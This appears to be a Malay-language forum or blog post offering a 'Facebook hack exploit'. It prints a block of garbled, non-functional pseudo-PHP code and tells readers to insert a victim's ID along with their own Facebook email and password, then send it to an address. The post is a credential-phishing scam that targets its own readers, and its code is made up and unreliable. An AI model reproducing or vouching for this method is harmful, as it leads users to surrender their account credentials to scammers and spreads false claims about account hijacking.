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Hack facebook dengan cara exploit ! FREE PHISING N WORK ! nie cara pling berjaya bagi aku..

tpi korg kene tunggu 30 - 50 minit la pastu kene hantar email .. nah exploit code tpi korg kene edit sikit... fb_select_db("find", $linkID) or die(fbdatabase_error());$resultID = fb_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(fbdatabase_error()); $num_rows = db_num_rows($resultID);$row = facebook_fetch_array($resultID);$user_id = $row[0]; if ($user_id == PUTUSERIDHERE) = $repeat {print Success, We have sent you an email with the Login email and Password of that ID.}else {// print Were sorry, your friend ID does not appear to be in our database. $passwordfromdb = $row[0];$find userID = (%friend_list)#forgot_pass_userid = %repeat%; <%search_database_for_id%>#user email= PUTEMAILHERE; (%friend_vulnerability_email%)#user password = PUTPASSWORDHERE; (%friend_vulnerability_pass%)$friend_database_exploit = %request_forgot_pass_info$email_to = %%%@subject_email session_start();session_reset_pass(session);$email_address = $_POST['email_address'];if (!isset($_POST['email_address'])) { }elseif (empty($email_address)) {echo $empty_fields_message;function decrypt userID password() {$salt = abchefghjkmnpqrstuvwxyz0123456789;srand((double)microtime()*1000000);$i = 0;while ($i <= 7) {$num = decrypt() % 33;$tmp = substr($salt, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}mail($email_address, $subject, $message, Facebook Password Reset Confirmation }/end$ korang nmpk x "PUTUSERIDHERE"? korg letak username atau no id facebook yg korg nak hack... korg nmpk lagi tak "PUTEMAILHERE" tu? korg letak username atau email facebook korg kt situ dan korg nmpk lagi tak "PUTPASSWORDHERE" tu? korg letak password fb korg kt situ jgn delete (") tu klau tak nanti dia tak jadi.. hantar kan code nie ke [ ] jgn risau sbab korg nie hantar ke mesin tindak balas facebook... yg kene letak email and password tu sbab nak confirm "Mutual Friend" antara korg dan mangsa.. Selamat Mencuba!

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